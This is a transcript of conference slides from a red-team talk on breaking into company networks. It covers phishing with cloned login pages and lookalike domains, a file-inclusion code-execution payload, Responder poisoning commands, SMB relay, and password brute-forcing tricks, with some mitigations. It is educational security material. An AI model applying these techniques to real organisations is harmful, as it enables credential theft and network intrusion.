BSides Philly Finding a Company's BreakPoint

transcript

Finding a Company’s BreakPointBy: Zack Meyers

& Andrew McNicol

Modern Day Hacking

Agenda

~$ whoami OverviewOur MethodologyHow to Go Beyond a Scan1. Phishing2. Web Application Vulnerabilities3. Multicast Name Resolution Poisoning4. SMB Relay Attacks5. Account CompromiseFinal Thoughts and TipsUseful Training and Links

~$ whoami

Zack Meyers (@b3armunch)Andrew McNicol (@primalsec)

Red Team @BreakPoint Labs (@0xcc_labs)

Bloggers/Podcasters @Primal Security (@primalsec)

Past: BSidesCHARM, BSidesDC, RVASec

Certification Junkies (OSCE, OSCP, GWAPT, GPEN etc.)

Python, CTFs, Learning, long walks on the beach (

@AnnapolisSec)

Things Have Changed Since the 90s

Overview

Goal: Break the mindset of “Scan then Exploit”

Cover 5 ways we commonly break into a network:

1. Phishing

2. Web Application Vulnerabilities

3. Multicast Name Resolution Poisoning

4. SMB Relay Attacks

5. Account Compromise

Our Methodology (High Level)

Planning and Scoping

Reconnaissance

Mapping

Automated Testing

Manual Testing

Reporting

Remediation Support

How to Go Beyond a Scan

1. Mindset: Fail 1000s of times and Continue Trying

2. Recon + Mapping: Find Systems + Content Others Have Missed

3. Automated Testing: Run the appropriate tool for the job

4. Manual Testing:

Identify, Understand, and Fuzz all Areas of Input

Research all Version Specific Vulnerabilities

Combine Findings, Remove False Positives, and Abuse Features

5. Reporting: Highlight Business Impact

1. Phishing

[surprise] Phishing actually works. [/surprise]

Here is the process we generally follow:

1. Planning: Goals, ROE, what happens when the user clicks?

2. Determine Scenario: Ransomware, Targeted, etc.

3. Determine Phishing Domains

4. Find Vulnerabilities: Email Spoofing

5. Execute the Engagement

Full Blog Here: https://breakpoint-labs.com/phishing/

1. Phishing: Planning

Work with the customer to understand their needs for the Phishing

campaign (Compliance, Part of a larger engagement, etc.)

We prefer to send email via Python (smtp module)

We generally perform these three types of engagements:

1. Click Analysis: Determine how many users clicked a link

2. Credential Gathering: Prompt for Credentials

3. Execute Code: PowerShell, Office Macros, HTAs, etc.

CEOs Reaction to Opening to Phishing Email

1. Phishing: Scenario

2 Main Types of Scenarios: Common Malware, and Targeted Attacker

UPS Tracking Ransomware: Cloned Site + Password Prompt:

1. Phishing: Phishing Domains

The scenario will determine what domains we leverage

If our goal is to perform a more targeted attack we will attempt use a

similar domain to the target organization and clone login portals:

breakpoint-labs.com vs. breakpoint-lab.com

If our goal is more common threat we will emulate those TTPs:

ups-pkgtracker.com

Its important to submit domains to web content filters/proxies

1. Phishing: Finding Vulnerabilities

Outlook client – Email below is sent from a Gmail account:

1. Phishing: Possible Scenarios

Click Analysis: We generally use Python to send email + create a unique

link per email to targets

Credential Grabbing: We generally use PHP to prompt for credentials

Execute Code: Usually leverage Empire (Office Macro, HTA method)

Is your input being presented on the screen? -> XSS

Is your input calling on stored data? -> SQLi

Does input generate an action to an external service? -> SSRF

Does your input call on a local or remote file? -> File Inclusion

Does your input end up on the file system? -> File Upload

Does your input cause another page to load? -> Redirect Vulns

Can we enumerate technology and versions? -> Lots of Vulns

2. Web Application Vulnerabilities

2. Web App Vulns: File Inclusion

File Inclusion vulns can lead to code execution “php include()”

Sometimes they are limited to just file inclusion “php echo()”

LFIs normally require you to get your input on disk then include

the affected resource (log poisoning)

RFIs are normally easier to exploit as you can point them to an

external resource containing your code

2. Web App Vulns: Step 1

Unlinked resource “debug.php”- HTTP 200 OK and blank screen

Never underestimate the power of a good lunch!

Parameters are fuzzed to enumerate inputs. "page=test" gives back a different

response "Failed opening 'test' for inclusion”

Attempt to execute code: 1.php = <?php system(‘id’);?>

IN REAL LIFE: The web service was running as SYSTEM!

3. Multicast Name Resolution Poisoning

A majority of the time internal networks will have name resolution traffic

enabled with the following protocols:

Link-Local Multicast Name Resolution (LLMNR)

Netbios Name (NBT-NS) services.

Multicast DNS (mDNS)

By listening, intercepting and manipulating name resolution traffic an attacker

can redirect authentication traffic and perform Man in the Middle (MITM)

attacks.

Responder!

3. Enter Responder.py

Responder is a Python script that aids in:

Multicast Protocol Poisoning (LLMNR, NBT-NS, mDNS)

WPAD Spoofing (Web Proxy Auto Discovery) using a non authorized server as a

proxy server for all HTTP requests to the Internet.

MITM Attacks (Intercepting credential exchanges between hosts leading to

password cracking, pass the hash, SMB relay attacks, etc.)

Rouge Server Services (SMTP, IMAP, POP3, SMB, Kerberos, FTP, HTTP, HTTPS,

DNS, LDAP, SQL, etc.)

3. Responder.py - Use Case 1 Rouge Services

Syntax: ~$ responder -I eth0 -f

3. Responder.py - Use Case 2 WPAD

Syntax: ~$ responder -I eth0 -bw

3. Responder.py - Use Case 3 Analyze

Syntax: ~$ responder -I eth0 -A

3. Prevent Multicast Name Communication Attacks

Preventing multicast communication attacks through:

Disable Broadcast Protocols: LLMNR (Link Local Multicast Name Resolution) and

NBNS (NetBios Name Resolution)

Prevent WPAD Poisoning w/ WPAD file entries in DNS

Segment the local networks with VLANS to prevent impact

Ensure that only NTLMv2 is in use rather than LM and NTLM

4. SMB Relay Attacks

SMB relay attacks occur once an attacker inserts themselves in

between the NTLM Challenge/Response protocol exchange.

The attacker needs the victim to initiate an HTTP or SMB connection.

This initiation can occur often from either:

LLMNR/NBNS spoofing

Automated processes attempting to authenticate to systems

(ex. patch management, antivirus updates, vulnerability scanners,

custom admin scripts, etc.)

So You Started a Scan

4. SMB Relay Attack Visual: Automated Process

4. SMB Relay Attack: Multicast Poisoning

Attackers IP: 192.168.56.103

Windows Client (Target): 192.168.56.105

Windows DC: 192.168.56.102

4. SMB Relay Attack: Multicast Poisoning Cont.

Attackers IP: 192.168.56.103

Windows DC: 192.168.56.102

4. SMB Relay Attack: Multicast Poisoning Cont.

Attackers IP: 192.168.56.103

Windows DC: 192.168.56.102

4. SMB Relay Attack: Nessus Scanner Scenario

4. Prevent SMB Relay Attacks

Preventing SMB relay attacks through:

Require SMB Signing

Disable Broadcast Protocols: LLMNR (Link Local Multicast Name Resolution) and

NBNS (NetBios Name Resolution)

Prevent WPAD Poisoning w/ WPAD file entries in DNS

Prevent SMB Traffic Outbound

Enable EPA (Extended Protection and Authentication)

5. Account Compromise

Combines several vulnerabilities to demonstrate risk:

- Username enumeration (Low) +- Lack of Automation Controls (Low) +- Lack of Password Complexity Reqs (Low) =- Account Compromise (Critical)

5. Acct Comp: Username Enumeration

Password Reset Feature “Email address not found” Login Error Message “Invalid Username”’ Contact Us Features “Which Admin do you want to contact?” Timing for login Attempts: Valid = 0.4 secs Invalid = 15 secs User Registration “Username already exists” Various error messages, and HTML source Google Hacking and OSINT Sometimes the application tells you

5. Acct Comp: Automation Controls

Pull the auth request up in Burp’s Repeater and try it a few times No sign of automation controls? -> Burp Intruder

- No account lockout- Non-existent or Weak CAPTCHA- Main login is strong, but others? (Mobile Interface, API, etc.)

5. Acct Comp: Weak Passwords

We as humans are bad at passwords…here are some tricks:- Password the same as username- Variations of “password”: “p@ssw0rd”…- Month+Year, Season+Year: winter2015…- Company Name + year- Keyboard Walks – PW Generator: “!QAZ2wsx”

Lots of wordlists out there, consider making a targeted wordlist

Research the targeted user’s interests and build lists around those interests

5. Acct Comp: Default and Shared

Attempt to brute force across all the things

Brute Force Tools: Burp Suite’s Intruder, Hydra, CrackMapExec, MSF SMB

modules, Nmap, etc.

Always try default creds for any given technology

We commonly see shared Linux root creds, and shared Windows local admin

creds across the entire enterprise

Final Thoughts and Tips

Use Shodan and Censys.io for external reconnaissance

Make sure you investigate shares (enum4linux)

Unlinked Content enumeration on web applications is key

Passwords written down on sticky notes? Yea usually

Can you reset a PW via the Help Desk?

Put a focus on feature abuse: What does the technology let you do? How can

you abuse that functionality?

Once you get valid credentials try them across all the things

Useful Trainings & Links Free Training: Cybrary CTFs: Vulnhub, Past CTF Writeups, Pentester Lab Training: Offensive Security, SANS, SecurityTube Book: Web Application Hackers Handbook

• Book: Black Hat Python• Talks: IronGeek (Adrian Crenshaw’s) YouTube Channel• Talk: How to Shot Web - Jason Haddix• Talk: How to be an InfoSec Geek - Primal Security• Talk: File in the hole! - Soroush Dalili• Talk: Exploiting Deserialization Vulnerabilities in Java• Talk: Polyglot Payloads in Practice - Marcus Niemietz• Talk: Running Away From Security - Micah Hoffman• Talk: Beyond Automated Testing – Us! • GitHub Resource: Security Lists For Fun & Profit

Contact Us

Site: https://www.breakpoint-labs.comEmail: info@breakpoint-labs.com

Twitter: @0xcc_labs

We Are Hiring – Remote Positions Available

BSides Philly Finding a Company's BreakPoint

Technology